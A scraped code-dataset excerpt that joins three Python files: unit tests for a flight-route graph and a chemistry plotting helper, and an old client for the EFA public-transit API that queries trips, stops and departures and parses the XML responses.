graph.add_from_json('../Data/map_data.json')
longest = graph.longest_flight()
self.assertEqual(longest[2], 12051)
self.assertTrue(longest[0] in ("SYD", "LAX"))
self.assertTrue(longest[1] in ("SYD", "LAX"))
self.assertIsNot(longest, 0)
pass
def test_shortest_flight(self):
"""
Tests the shortest_flight function in the Graph class
:return: true if all tests pass
"""
graph = Graph()
graph.add_from_json('../Data/map_data.json')
shortest = graph.shortest_flight()
self.assertEqual(shortest[2], 334)
self.assertTrue(shortest[0] in ("WAS", "NYC"))
self.assertTrue(shortest[1] in ("WAS", "NYC"))
self.assertIsNot(shortest[2], 0)
pass
def test_average_distance(self):
"""
Tests the average distance
:return: true if all test pass
"""
graph = Graph()
graph.add_from_json('../Data/map_data.json')
average = graph.average_distance()
self.assertEqual(average, 2300.276595744681)
self.assertNotEqual(average, 0)
pass
def test_biggest_city(self):
"""
Tests the biggest city
:return: true if all tests pass
"""
graph = Graph()
graph.add_from_json('../Data/map_data.json')
biggest = graph.biggest_city()
self.assertEqual(biggest[2], 34000000)
self.assertTrue(biggest[1] in ("TYO", "Tokyo"))
self.assertTrue(biggest[0] in ("TYO", "Tokyo"))
pass
def test_smallest_city(self):
"""
Tests the smallest city
:return: true if all tests pass
"""
graph = Graph()
graph.add_from_json('../Data/map_data.json')
smallest = graph.smallest_city()
self.assertEquals(smallest[2], 589900)
self.assertTrue(smallest[0] in ("ESS", "Essen"))
self.assertTrue(smallest[1] in ("ESS", "Essen"))
pass
def test_average_city_size(self):
"""
Test the average city size
:return: true if all tests pass
"""
graph = Graph()
graph.add_from_json('../Data/map_data.json')
average = graph.average_city_size()
self.assertEqual(average, 11796143)
self.assertNotEqual(average, 0)
pass
def test_continents_and_cities(self):
"""
Test the continents and cities
:return: true if all tests pass
"""
graph = Graph()
graph.add_from_json('../Data/map_data.json')
list_continents_and_cities = graph.continents_and_cities()
self.assertNotEqual(len(list_continents_and_cities), 0)
cities = ("Buenos Aires", "Bogota", "Santiago", "Lima", "Sao Paulo")
self.assertTrue(list_continents_and_cities["South America"][0] in cities)
self.assertTrue(list_continents_and_cities["South America"][1] in cities)
self.assertTrue(list_continents_and_cities["South America"][2] in cities)
self.assertTrue(list_continents_and_cities["South America"][3] in cities)
self.assertTrue(list_continents_and_cities["South America"][4] in cities)
cities = ("Beijing", "Bangkok", "Osaka", "Taipei", "Chennai", "Shanghai", "Mumbai", "Ho Chi Minh City", "Riyadh", "Karachi", "Manila", "Tokyo", "Seoul", "Bagdad", "Delhi", "Jakarta", "Hong Kong", "Calcutta", "Tehrah")
self.assertTrue(list_continents_and_cities["Asia"][0] in cities)
self.assertTrue(list_continents_and_cities["Asia"][1] in cities)
self.assertTrue(list_continents_and_cities["Asia"][2] in cities)
self.assertTrue(list_continents_and_cities["Asia"][3] in cities)
self.assertTrue(list_continents_and_cities["Asia"][4] in cities)
self.assertTrue(list_continents_and_cities["Asia"][5] in cities)
self.assertTrue(list_continents_and_cities["Asia"][6] in cities)
self.assertTrue(list_continents_and_cities["Asia"][7] in cities)
self.assertTrue(list_continents_and_cities["Asia"][8] in cities)
self.assertTrue(list_continents_and_cities["Asia"][9] in cities)
self.assertTrue(list_continents_and_cities["Asia"][10] in cities)
self.assertTrue(list_continents_and_cities["Asia"][11] in cities)
self.assertTrue(list_continents_and_cities["Asia"][12] in cities)
self.assertTrue(list_continents_and_cities["Asia"][13] in cities)
self.assertTrue(list_continents_and_cities["Asia"][14] in cities)
self.assertTrue(list_continents_and_cities["Asia"][15] in cities)
self.assertTrue(list_continents_and_cities["Asia"][16] in cities)
self.assertTrue(list_continents_and_cities["Asia"][17] in cities)
self.assertTrue(list_continents_and_cities["Asia"][18] in cities)
pass
def test_hubs(self):
"""
Test the hubs in the network
:return: true if all tests pass
"""
graph = Graph()
graph.add_from_json('../Data/map_data.json')
hubs = graph.hubs()
dict = {('HKG', 6),('IST', 6),('BGW', 5),('BKK', 5),('BOG', 5)}
self.assertTrue(hubs[0] in dict)
self.assertTrue(hubs[1] in dict)
self.assertTrue(hubs[2] in dict)
self.assertTrue(hubs[3] in dict)
self.assertTrue(hubs[4] in dict)
pass
def test_remove_cities(self):
"""
Test the remove cities function
:return: true if all tests pass
"""
graph = Graph()
graph.add_from_json('../Data/test.json')
self.assertTrue("AYY" in graph.vertices)
self.assertTrue("LOL" in graph.vertices)
self.assertTrue("LMA" in graph.vertices)
self.assertTrue("AYY" in graph.edges)
self.assertTrue("AYY" in graph.edges["AYY"][0].start)
graph.remove_city("AYY")
self.assertFalse("AYY" in graph.vertices)
self.assertFalse("AYY" in graph.edges)
for _list in graph.edges.values():
for edge in _list:
self.assertFalse("AYY" == edge.start)
self.assertFalse("AYY" == edge.destination)
pass
def test_remove_route(self):
"""
Test the remove route function
:return: true if all tests pass
"""
graph = Graph()
graph.add_from_json('../Data/test.json')
self.assertTrue("AYY" in graph.edges)
ayy_edge = graph.edges["AYY"]
for edge in ayy_edge:
self.assertTrue("AYY" == edge.start)
for edge in graph.edges["LOL"]:
self.assertTrue("AYY" == edge.destination or "LMA" == edge.destination)
graph.remove_route("AYY", "LOL")
for edge in ayy_edge:
self.assertFalse("LOL" == edge.destination)
for edge in graph.edges["LOL"]:
self.assertTrue("AYY" == edge.destination or "LMA" == edge.destination)
graph.remove_route("LOL", "AYY")
for edge in graph.edges["LOL"]:
self.assertFalse("AYY" == edge.destination)
pass
def test_add_city(self):
"""
Test the add city function
:return: true if all tests pass
"""
graph = Graph()
metros = {'code': "SCL", 'name': "Santiago", 'country': "CL", 'continent': "South America", 'timezone': -4,
'coordinates': {"S": 33, "W": 71}, 'population': 6000000, 'region': 1}
vertex = Vertex(metros)
self.assertFalse(vertex in graph.vertices)
graph.add_city(metros)
self.assertTrue("SCL" in graph.vertices)
other_vertex = graph.vertices["SCL"]
self.assertTrue(vertex.code == other_vertex.code)
self.assertTrue(vertex.name == other_vertex.name)
self.assertTrue(vertex.country == other_vertex.country)
self.assertTrue(vertex.continent == other_vertex.continent)
self.assertTrue(vertex.timezone == other_vertex.timezone)
self.assertTrue(vertex.coordinates == other_vertex.coordinates)
self.assertTrue(vertex.population == other_vertex.population)
self.assertTrue(vertex.region == other_vertex.region)
pass
def test_add_route(self):
"""
Test the add route function
:return: true if all tests pass
"""
graph = Graph()
distance = 420
start = "LOL"
destination = "KEK"
edge = Edge(distance, start, destination)
self.assertFalse("LOL" in graph.edges)
graph.add_route(distance, start, destination)
self.assertTrue("LOL" in graph.edges)
self.assertTrue(start == graph.edges["LOL"][0].start)
self.assertTrue(destination == graph.edges["LOL"][0].destination)
self.assertTrue(distance == graph.edges["LOL"][0].distance)
self.assertTrue(edge.start == graph.edges["LOL"][0].start)
self.assertTrue(edge.destination == graph.edges["LOL"][0].destination)
self.assertTrue(edge.distance == graph.edges["LOL"][0].distance)
pass
def test_edit_city(self):
"""
Test the edit city function
:return: true if all tests pass
"""
graph = Graph()
graph.add_from_json('../Data/test.json')
self.assertTrue("LOL" in graph.vertices)
vertex = graph.vertices["LOL"]
self.assertTrue(vertex.code == "LOL")
self.assertTrue(vertex.name == "Hello")
graph.edit_city("LOL", "code", "KEK")
self.assertTrue("KEK" in graph.vertices)
self.assertFalse("LOL" in graph.vertices)
vertex = graph.vertices["KEK"]
self.assertTrue(vertex.name == "Hello")
graph.edit_city("KEK", "name", "BLAH")
self.assertTrue(vertex.name == "BLAH")
pass
def test_route_info(self):
"""
Test whether the route information is correct
:return: true if all tests pass
"""
graph = Graph()
graph.add_from_json('../Data/test.json')
route = graph.route_info(["LOL", "AYY"])
self.assertTrue(route[0] == 2736)
self.assertTrue(route[1] == 957.6)
self.assertTrue(route[2] == 4.18)
route = graph.route_info(["LOL", "AYY", "LMA"])
self.assertTrue(route[0] == 9705)
self.assertTrue(route[1] == 3048.3)
self.assertTrue(route[2] == 15.84)
route = graph.route_info(["BLAH", "LOL"])
self.assertTrue(route == (0, 0, 0))
pass
def test_djikstra(self):
"""
Test whether djikstra calculates the shortest route
:return: true if all tests pass
"""
graph = Graph()
graph.add_from_json('../Data/test.json')
route = graph.djikstra("AYY", "LMA")
self.assertTrue(["AYY", "LOL", "LMA"] == route)
route = graph.djikstra("LMA", "AYY")
self.assertTrue(route == ["LMA", "LOL", "AYY"])
route = graph.djikstra("LOL", "LMA")
self.assertTrue(route == ["LOL", "LMA"])
route = graph.djikstra("LMA", "LOL")
self.assertTrue(route == ["LMA", "LOL"])
| 0 | 11,939 | 25 |
2cca849ff3e302117332a11854b3931a325f5621 | 972 | py | Python | tests/test_plots/test_base_plot.py | CMargreitter/ChemCharts | ec47b8f572f6b77518051aafc578557a5a10c2d0 | [
"Apache-2.0"
] | 16 | 2022-01-29T05:32:13.000Z | 2022-03-02T15:19:17.000Z | tests/test_plots/test_base_plot.py | CMargreitter/ChemCharts | ec47b8f572f6b77518051aafc578557a5a10c2d0 | [
"Apache-2.0"
] | 7 | 2022-02-01T22:34:57.000Z | 2022-03-11T23:02:27.000Z | tests/test_plots/test_base_plot.py | CMargreitter/ChemCharts | ec47b8f572f6b77518051aafc578557a5a10c2d0 | [
"Apache-2.0"
] | 1 | 2022-01-19T12:41:38.000Z | 2022-01-19T12:41:38.000Z | import unittest
from chemcharts.core.plots.base_plot import BasePlot
| 34.714286 | 84 | 0.693416 | import unittest
from chemcharts.core.plots.base_plot import BasePlot
class TestBasePlot(unittest.TestCase):
@classmethod
def setUpClass(cls) -> None:
pass
def test_path_update_snapshot(self):
test_base_plot = BasePlot()
test_updated_path = test_base_plot._path_update_snapshot(
ori_path="../junk/base_plot_test/path_update.png", epoch_id=2)
self.assertIn(
"/base_plot_test/0002_path_update.png",
test_updated_path)
test_updated_path = test_base_plot._path_update_snapshot(
ori_path="../junk/base_plot_test/path_update", epoch_id=6)
self.assertIn(
"/base_plot_test/0006_path_update.png",
test_updated_path)
test_updated_path = test_base_plot._path_update_snapshot(
ori_path="../junk/base_plot_test/path_update.jpeg", epoch_id=12)
self.assertIn("junk/base_plot_test/0012_path_update.png", test_updated_path)
| 791 | 87 | 23 |
b163d91b901f7d637f3ef8540aeac505134ad228 | 39,730 | py | Python | src/choo/apis/efa.old.py | codingcatgirl/choo | 128990f1fe89a4740110ead81987832e01bf7393 | [
"Apache-2.0"
] | null | null | null | src/choo/apis/efa.old.py | codingcatgirl/choo | 128990f1fe89a4740110ead81987832e01bf7393 | [
"Apache-2.0"
] | null | null | null | src/choo/apis/efa.old.py | codingcatgirl/choo | 128990f1fe89a4740110ead81987832e01bf7393 | [
"Apache-2.0"
] | null | null | null | import re
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta
import requests
from ...models import (POI, Address, Coordinates, Line, LineType, LineTypes, LiveTime, Location, MetaRide, Platform,
Ride, RidePoint, RideSegment, Searchable, Stop, TicketData, TicketList, Trip, Way, WayEvent,
WayType)
from .base import API
| 40.916581 | 117 | 0.546313 | import re
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta
import requests
from ...models import (POI, Address, Coordinates, Line, LineType, LineTypes, LiveTime, Location, MetaRide, Platform,
Ride, RidePoint, RideSegment, Searchable, Stop, TicketData, TicketList, Trip, Way, WayEvent,
WayType)
from .base import API
class EFA(API):
def __init__(self, name, base_url, preset='de', country_by_id=(), replace_in_full_name={}, **kwargs):
super().__init__(name, **kwargs)
self.base_url = base_url
self.country_by_id = () if country_by_id is None else country_by_id
self.replace_in_full_name = {}
if preset == 'de':
self.replace_in_full_name = {
', Hauptbahnhof$': ' Hbf',
' Hauptbahnhof$': ' Hbf',
' Bahnhof$': '',
' Bf$': '',
' S$': '',
', Hbf%': ' Hbf'
}
self.replace_in_full_name.update(replace_in_full_name)
def _query_get(self, obj):
if isinstance(obj, Stop):
result, now = self._request_departures(obj)
if not isinstance(result, obj.__class__):
result = None
else:
raise NotImplementedError
return result, now
def _query_search(self, model, request):
if model == Location:
return self._request_stops(request)
elif model == Trip:
return self._request_trips(request)
raise NotImplementedError
def _finalize_stop(self, stop):
if stop.full_name is None:
return
if stop.name is not None and stop.city is None and stop.full_name.endswith(' '+stop.name):
stop.city = stop.full_name[:-len(stop.name)].strip()
if stop.city.endswith(','):
stop.city = stop.city[:-1]
stop.full_name = stop.full_name+'$'
for before, after in self.replace_in_full_name.items():
stop.full_name = stop.full_name.replace(before, after)
stop.full_name = stop.full_name.replace('$', '').strip()
if stop.full_name.endswith(','):
stop.full_name = stop.full_name[:-1]
if stop.name is not None and stop.city is not None:
if stop.full_name == stop.city+' '+stop.name:
stop.full_name = stop.city+', '+stop.name
# yes, again. exactly at this position, to not strigger
if stop.name is not None and stop.city is None and stop.full_name.endswith(' '+stop.name):
stop.city = stop.full_name[:-len(stop.name)].strip()
# Internal methods start here
def _convert_location(self, location, wrap=''):
""" Convert a Location into POST parameters for the EFA Requests """
myid = location.id if location.source == self.name else None
city = location.city
name = location.name
if city is None and location.full_name is not None:
name = location.full_name
model = location.Model if isinstance(location, Location.Request) else location.__class__
if name is None:
if location.lat is not None and location.lon is not None:
r = {'type': 'coord', 'name': '%.6f:%.6f:WGS84' % (location.lon, location.lat)}
else:
r = {'type': 'stop', 'place': city, 'name': ''}
elif issubclass(model, Stop):
if myid is not None:
r = {'type': 'stop', 'place': None, 'name': str(myid)}
elif location.ifopt is not None and location.country is not None:
r = {'type': 'stop', 'place': None,
'name': '%s:%s:%s' % ((location.country, ) + location.ifopt)}
else:
r = {'type': 'stop', 'place': city, 'name': name}
elif issubclass(model, Address):
r = {'type': 'address', 'place': city, 'name': name}
elif issubclass(model, POI):
if myid is not None:
r = {'type': 'poiID', 'name': str(myid)}
else:
r = {'type': 'poi', 'place': city, 'name': name}
elif issubclass(model, Location):
r = {'type': 'any', 'place': city, 'name': name if name else None}
else:
raise NotImplementedError
if r['place'] is None:
del r['place']
if wrap:
r = {wrap % n: v for n, v in r.items()}
return r
def _request(self, endpoint, data):
text = requests.post(self.base_url + endpoint, data=data).text
if self.dump_raw:
open('dump.xml', 'w').write(text)
xml = ET.fromstring(text)
servernow = datetime.strptime(xml.attrib['now'], '%Y-%m-%dT%H:%M:%S')
return xml, servernow
def _request_trips(self, triprequest):
""" Searches connections/Trips; Returns a SearchResult(Trip) """
now = datetime.now()
assert triprequest.walk_speed in ('slow', 'normal', 'fast')
linetypes = triprequest.linetypes
if linetypes is None:
linetypes = LineTypes()
departure = triprequest.departure
arrival = triprequest.arrival
if isinstance(departure, datetime):
departure = LiveTime(departure)
if isinstance(arrival, datetime):
arrival = LiveTime(arrival)
if departure is not None:
deparr = 'dep'
time_ = departure.expected_time
elif arrival is not None:
deparr = 'arr'
time_ = arrival.expected_time
else:
deparr = 'dep'
time_ = now
max_changes = triprequest.max_changes
if max_changes is None:
max_changes = 9
post = {
'changeSpeed': triprequest.walk_speed,
'command': '',
'coordOutputFormat': 'WGS84',
'imparedOptionsActive': 1,
'includedMeans': 'checkbox',
'itOptionsActive': 1,
'itdDateDay': time_.day,
'itdDateMonth': time_.month,
'itdDateYear': time_.year,
'itdTimeHour': time_.hour,
'itdTimeMinute': time_.minute,
'itdTripDateTimeDepArr': deparr,
'language': 'de',
'locationServerActive': 1,
'maxChanges': max_changes,
'name_via': '', # .decode('utf-8').encode('iso-8859-1'),
'nextDepsPerLeg': 1,
'place_via': '', # decode('utf-8').encode('iso-8859-1'),
'ptOptionsActive': 1,
'requestID': 0,
'routeType': 'LEASTTIME',
# {'speed':'LEASTTIME', 'waittime':'LEASTINTERCHANGE', 'distance':'LEASTWALKING'}[select_interchange_by],
'sessionID': 0,
'type_via': 'stop',
'useRealtime': 1,
'outputFormat': 'XML'
}
# if use_realtime: post['useRealtime'] = 1
if 'train' in linetypes:
post['inclMOT_0'] = 'on'
if 'train.longdistance.highspeed' in linetypes:
post['lineRestriction'] = 400
elif 'train.longdistance' in linetypes:
post['lineRestriction'] = 401
else:
post['lineRestriction'] = 403
for linetype, number in (('urban', '1'), ('metro', '2'), ('metro', '3'),
('tram', '4'), ('bus.city', '5'), ('bus.regional', '6'),
('bus.express', '7'), ('suspended', '8'), ('ship', '9'),
('dialable', '10'), ('other', '11')):
if linetype in linetypes:
post['inclMOT_' + number] = 'on'
if triprequest.wayduration_origin or triprequest.wayduration_destination:
post['useProxFootSearch'] = 1
waytypes = {'walk': 100, 'bike': 101, 'car': 104, 'taxi': 105}
post['trITDepMOT'] = waytypes[str(triprequest.waytype_origin)]
post['trITArrMOT'] = waytypes[str(triprequest.waytype_destination)]
post['trITDepMOTvalue%d' % post['trITDepMOT']] = triprequest.wayduration_origin.total_seconds() // 60
post['trITArrMOTvalue%d' % post['trITArrMOT']] = triprequest.wayduration_destination.total_seconds() // 60
if triprequest.with_bike:
post['bikeTakeAlong'] = 1
if triprequest.wheelchair:
post['wheelchair'] = 1
if triprequest.low_floor_only:
post['lowPlatformVhcl'] = 1
if not triprequest.allow_solid_stairs:
post['noSolidStairs'] = 1
if not triprequest.allow_escalators:
post['noEscalators'] = 1
if not triprequest.allow_elevators:
post['noElevators'] = 1
post.update(self._convert_location(triprequest.origin, '%s_origin'))
post.update(self._convert_location(triprequest.destination, '%s_destination'))
xml, servernow = self._request('XSLT_TRIP_REQUEST2', post)
data = xml.find('./itdTripRequest')
results = Trip.Results(self._parse_trips(data.find('./itdItinerary/itdRouteList')))
results.origin = self._parse_location(data.find('./itdOdv[@usage="origin"]'))
results.destination = self._parse_location(data.find('./itdOdv[@usage="destination"]'))
# todo – better exceptions here
if isinstance(results.origin, list):
raise ValueError('origin not found')
if isinstance(results.destination, list):
raise ValueError('destination not found')
return results, servernow
def _request_stops(self, stop):
""" Searches a Stop; Returns a SearchResult(Stop) """
post = {
'language': 'de',
'outputFormat': 'XML',
'coordOutputFormat': 'WGS84',
'locationServerActive': 1,
# 'regionID_sf': 1, // own region
'SpEncId': 0,
'odvSugMacro': 'true',
'useHouseNumberList': 'true',
}
post.update(self._convert_location(stop, '%s_sf'))
xml, servernow = self._request('XSLT_STOPFINDER_REQUEST', post)
data = xml.find('./itdStopFinderRequest')
results = self._parse_location(data.find('./itdOdv'))
if type(results) != list:
return stop.Model.Results([results] if isinstance(results, stop.Model) else []), servernow
results = [result for result in results if isinstance(result[0], stop.Model)]
if isinstance(stop, Searchable.Request) and stop.limit is not None:
results = results[:stop.limit]
return stop.Model.Results(results, scored=True), servernow
def _request_departures(self, stop: Stop, time=None):
""" Fills in Stop.rides; Can Return A SearchResult(Stop) without rides. """
if time is None:
time = datetime.now()
post = {
'command': '',
'coordOutputFormat': 'WGS84',
'imparedOptionsActive': 1,
'itdDateDay': time.day,
'itdDateMonth': time.month,
'itdDateYear': time.year,
'itdTimeHour': time.hour,
'itdTimeMinute': time.minute,
'language': 'de',
'lsShowTrainsExplicit': 1,
'mode': 'direct',
'outputFormat': 'XML',
'locationServerActive': 1,
'itOptionsActive': 1,
'ptOptionsActive': 1,
'includeCompleteStopSeq': 1,
'depType': 'stopEvents',
'useRealtime': 1,
'stateless': 1,
'requestID': 0,
'sessionID': 0
}
post.update(self._convert_location(stop, '%s_dm'))
xml, servernow = self._request('XSLT_DM_REQUEST', post)
data = xml.find('./itdDepartureMonitorRequest')
stop = self._parse_location(data.find('./itdOdv'))
if type(stop) == list:
raise ValueError('Stop not found.')
# todo return Stop.Results(stop), servernow
lineslist = data.find('./itdServingLines')
if lineslist is not None:
rlines = []
lines = lineslist.findall('./itdServingLine')
for line in lines:
ride, origin, destination = self._parse_ride(line)
line = ride.meta.line
line.first_stop = origin
line.last_stop = destination
# line.low_quality = True
rlines.append(line)
stop.lines = Line.Results(rlines)
departureslist = data.find('./itdDepartureList')
stop.rides = self._parse_departures(departureslist, stop, servernow)
return stop, servernow
def _parse_stopid_country(self, i):
for s, country in self.country_by_id:
if i.startswith(s):
return country
return None
def _get_attrib(self, xml, *keys, noempty=True, default=None, strip=False):
attrib = xml.attrib
for key in keys:
value = attrib.get(key)
if strip:
value = value.strip()
if value or (not noempty and value == ''):
return value
return default
def _parse_stop_line(self, data):
""" Parse an AssignedStop ODV line """
stop = Stop(country=self._parse_stopid_country(data.attrib['stopID']),
name=data.text,
city=self._get_attrib(data, 'locality', 'place'),
full_name=self._get_attrib(data, 'nameWithPlace'),
id=int(data.attrib['stopID']))
gid = data.attrib.get('gid', '').split(':')
if len(gid) == 3 and min(len(s) for s in gid):
stop.country = 'de'
stop.ifopt = ':'.join((gid[1], gid[2]))
if 'x' in data.attrib:
stop.lat = float(data.attrib['y']) / 1000000
stop.lon = float(data.attrib['x']) / 1000000
result = Stop.Result(stop)
if 'distanceTime' in data.attrib:
result.duration = timedelta(minutes=int(data.attrib['distanceTime']))
result.distance = 0
if 'distance' in data.attrib:
result.distance = int(data.attrib['distance'])
return result
def _parse_location(self, data):
""" Parse an ODV (OriginDestinationVia) XML node """
odvtype = data.attrib['type']
results = []
# Place.city
p = data.find('./itdOdvPlace')
cityid = None
if p.attrib['state'] == 'empty':
city = None
elif p.attrib['state'] != 'identified':
if p.attrib['state'] == 'list':
pe = p.find('./odvPlaceElem')
for item in pe:
location = Location(None, city=item.text)
results.append(location)
return results
else:
pe = p.find('./odvPlaceElem')
cityid = pe.attrib.get('placeID')
city = pe.text
# Location.name
n = data.find('./itdOdvName')
if n.attrib['state'] == 'empty':
if city is not None:
location = Location(None, city)
results.append(location)
return results
elif n.attrib['state'] != 'identified':
if n.attrib['state'] == 'list':
ne = n.findall('./odvNameElem')
results = [self._parse_location_name(item, city, cityid, odvtype) for item in ne]
results.sort(key=lambda odv: odv[1], reverse=True)
return results
else:
ne = n.find('./odvNameElem')
result = self._parse_location_name(ne, city, cityid, odvtype)[0]
near_stops = []
for near_stop in data.findall('./itdOdvAssignedStops/itdOdvAssignedStop'):
stop = self._parse_stop_line(near_stop)
if stop.result != result:
near_stops.append(stop)
if near_stops:
result.near_stops = Stop.Results(near_stops)
return result
def _parse_location_name(self, data, city, cityid, odvtype):
""" Parses the odvNameElem of an ODV """
# AnyTypes are used in some EFA instances instead of ODV types
odvtype = self._get_attrib(data, 'anyType', default=odvtype)
# Even though we got the city, some APIs deliver it only in the odvNameElem…
city = self._get_attrib(data, 'locality', default=city)
# What kind of location is it? Fill in attributes.
name = data.attrib.get('objectName', data.text)
if odvtype == 'stop':
location = Stop(city=city, name=name)
elif odvtype == 'poi':
location = POI(city=city, name=name)
elif odvtype == 'street':
location = Address(city=city, name=name)
elif odvtype in ('singlehouse', 'coord', 'address'):
location = Address(city=city, name=name)
location.street = data.attrib['streetName'] if 'streetName' in data.attrib else None
location.number = data.attrib['buildingNumber'] if 'buildingNumber' in data.attrib else None
if location.number is None:
location.number = data.attrib['houseNumber'] if 'houseNumber' in data.attrib else None
location.name = '%s %s' % (location.street, location.number)
else:
raise NotImplementedError('Unknown odvtype: %s' % odvtype)
# IDs can come in different ways… Sometimes this is the only way to determine the Location type…
id_ = self._get_attrib(data, 'stopID', 'id')
if id_:
location.country = self._parse_stopid_country(id_)
location.id = int(id_)
# This is used when we got more than one Location
score = int(data.attrib.get('matchQuality', 0))
# Coordinates
if 'x' in data.attrib:
location.lat = float(data.attrib['y']) / 1000000
location.lon = float(data.attrib['x']) / 1000000
return location, score
def _parse_departures(self, data, stop, servernow):
""" Parses itdDeparture into a List of RideSegment """
servernow.replace(second=0, microsecond=0)
results = []
departures = data.findall('./itdDeparture')
for departure in departures:
# Get Line Information
ride, origin, destination = self._parse_ride(departure.find('./itdServingLine'))
if departure.find('./genAttrList/genAttrElem[value="HIGHSPEEDTRAIN"]') is not None:
ride.line.linetype = LineType('train.longdistance.highspeed')
elif departure.find('./genAttrList/genAttrElem[value="LONG_DISTANCE_TRAINS"]') is not None:
ride.line.linetype = LineType('train.longdistance')
# Build Ride Objekt with known stops
mypoint = self._parse_ridepoint(departure) # todo: take delay and add it to next stops
before_delay = after_delay = None
if mypoint.arrival:
before_delay = mypoint.arrival.delay
if mypoint.departure:
after_delay = mypoint.departure.delay
delay = None
if departure.find('./itdServingLine/itdNoTrain'):
delay = departure.find('./itdServingLine/itdNoTrain').attrib.get('delay', None)
if delay is not None:
delay = timedelta(minutes=delay)
if delay is not None:
if ((mypoint.arrival and servernow < mypoint.arrival.expected_time) or
(mypoint.departure and servernow < mypoint.departure.expected_time)):
before_delay = delay
else:
after_delay = delay
prevs = False
start = 0
for pointdata in departure.findall('./itdPrevStopSeq/itdPoint'):
point = self._parse_ridepoint(pointdata)
if point is not None:
if before_delay is not None:
if (point.arrival is not None and point.arrival.delay is None and
point.arrival.time + before_delay >= servernow):
point.arrival.delay = before_delay
if (point.departure is not None and point.departure.delay is None and
point.departure.time + before_delay >= servernow):
point.departure.delay = before_delay
prevs = True
ride.append(point)
start += 1
ride.append(mypoint)
onwards = False
for pointdata in departure.findall('./itdOnwardStopSeq/itdPoint'):
point = self._parse_ridepoint(pointdata)
if point is not None:
if after_delay is not None:
if (point.arrival is not None and point.arrival.delay is None and
point.arrival.time + after_delay >= servernow):
point.arrival.delay = after_delay
if (point.departure is not None and point.departure.delay is None and
point.departure.time + after_delay >= servernow):
point.departure.delay = after_delay
onwards = True
ride.append(point)
if not prevs and not onwards:
ride.prepend(None)
if origin is not None:
ride.prepend(RidePoint(Platform(origin)))
start += 1
ride.append(None)
if destination is not None:
ride.append(RidePoint(Platform(destination)))
if ride[0] is not None and ride.meta.id is not None:
ride.id = '%s:%s' % (ride.meta.id, ride[0].departure.time.strftime('%Y%m%d'))
# Return RideSegment from the Station we depart from on
results.append(ride[start:])
return Ride.Results(results)
def _parse_trips(self, data):
""" Parses itdRoute into a Trip """
trips = []
if data is None:
return trips
routes = data.findall('./itdRoute')
for route in routes:
trip = Trip()
interchange = None
for routepart in route.findall('./itdPartialRouteList/itdPartialRoute'):
part = self._parse_trippart(routepart)
if part is None:
continue
if interchange is not None:
if isinstance(part, RideSegment):
interchange.destination = part[0].platform
else:
interchange.destination = part[0].origin
trip._parts.append(part)
interchange = self._parse_trip_interchange(routepart)
if isinstance(part, RideSegment):
if interchange is not None:
interchange.origin = part[-1].platform
trip._parts.append(interchange)
else:
if interchange is not None:
part.events = interchange.events
interchange = None
ticketlist = TicketList()
tickets = route.find('./itdFare/itdSingleTicket')
if tickets:
authority = tickets.attrib['net']
ticketlist.single = TicketData(authority,
tickets.attrib['unitsAdult'],
float(tickets.attrib['fareAdult']),
float(tickets.attrib['fareChild']))
if tickets.get('fareBikeAdult'):
ticketlist.bike = TicketData(authority,
tickets.attrib['unitsBikeAdult'],
float(tickets.attrib['fareBikeAdult']),
float(tickets.attrib['fareBikeChild']))
ticketlist.currency = tickets.attrib['currency']
ticketlist.level_name = tickets.attrib['unitName']
for ticket in tickets.findall('./itdGenericTicketList/itdGenericTicketGroup'):
t = TicketData()
name = ticket.find('./itdGenericTicket[ticket="TICKETTYPE"]/value')
if name is None or not name.text:
continue
authority = ticket.find('./itdGenericTicket[ticket="TARIFF_AUTHORITY"]/value')
if authority is not None and authority.text:
t.authority = authority.text
level = ticket.find('./itdGenericTicket[ticket="FARE_CATEGORY"]/value')
if level is not None and level.text:
t.level = level.text
prices = []
adult = ticket.find('./itdGenericTicket[ticket="TICKET_ID_ADULT"]/value')
if adult is not None and adult.text:
price = ticket.find('./itdGenericTicket[ticket="FARE_ADULT"]/value')
if price is not None and price.text:
prices.append(float(price.text))
child = ticket.find('./itdGenericTicket[ticket="TICKET_ID_CHILD"]/value')
if child is not None and child.text:
price = ticket.find('./itdGenericTicket[ticket="FARE_CHILD"]/value')
if price is not None and price.text:
prices.append(float(price.text))
if not prices:
continue
t.price = prices[0]
if len(prices) == 2:
t.price_child = prices[1]
ticketlist.other[name.text] = t
trip.tickets = ticketlist
trips.append(trip)
return trips
def _parse_trippart(self, data):
""" Parses itdPartialRoute into a RideSegment or Way """
points = [self._parse_ridepoint(point) for point in data.findall('./itdPoint')]
path = []
for coords in data.findall('./itdPathCoordinates/itdCoordinateBaseElemList/itdCoordinateBaseElem'):
path.append(Coordinates(float(coords.find('y').text) / 1000000, float(coords.find('x').text) / 1000000))
motdata = self._parse_ride(data.find('./itdMeansOfTransport'))
if motdata is None or data.attrib['type'] == 'IT':
type_ = data.find('./itdMeansOfTransport').attrib['type']
if type_ == '97':
# Nicht umsteigen!
return None
waytype = {
'98': 'walk',
'99': 'walk',
'100': 'walk',
'101': 'bike',
'104': 'car',
'105': 'taxi'
}[type_]
# 98 = gesicherter anschluss
way = Way(WayType(waytype), points[0].stop, points[1].stop)
way.distance = data.attrib.get('distance')
if way.distance is not None:
way.distance = float(way.distance)
duration = data.attrib.get('timeMinute', None)
if duration is not None:
way.duration = timedelta(minutes=int(duration))
if path:
way.path = path
return way
else:
ride, origin, destination = motdata
if data.find('./genAttrList/genAttrElem[value="HIGHSPEEDTRAIN"]') is not None:
ride.line.linetype = LineType('train.longdistance.highspeed')
elif data.find('./genAttrList/genAttrElem[value="LONG_DISTANCE_TRAIN"]') is not None:
ride.line.linetype = LineType('train.longdistance')
# Build Ride Objekt with known stops
for infotext in data.findall('./infoTextList/infoTextListElem'):
ride.infotexts.append(infotext)
first = last = None
waypoints = False
if data.find('./itdStopSeq'):
new_points = [self._parse_ridepoint(point)
for point in data.findall('./itdStopSeq/itdPoint')]
if not new_points or new_points[0].stop != new_points[0].stop:
new_points.insert(0, points[0])
if new_points[-1].stop != points[1].stop:
new_points.append(points[1])
points = new_points
waypoints = True
first = 0
last = -1
for i, p in enumerate(points):
if i > 0 and not waypoints:
ride.append(None)
ride.append(p)
if origin is not None:
if origin != ride[0].stop:
ride.prepend(None)
ride.prepend(RidePoint(Platform(origin)))
first += 2
else:
ride.prepend(None)
first += 1
if destination is not None:
if destination != ride[-1].stop:
ride.append(None)
ride.append(RidePoint(Platform(destination)))
last -= 2
else:
ride.append(None)
last -= 1
last += 1
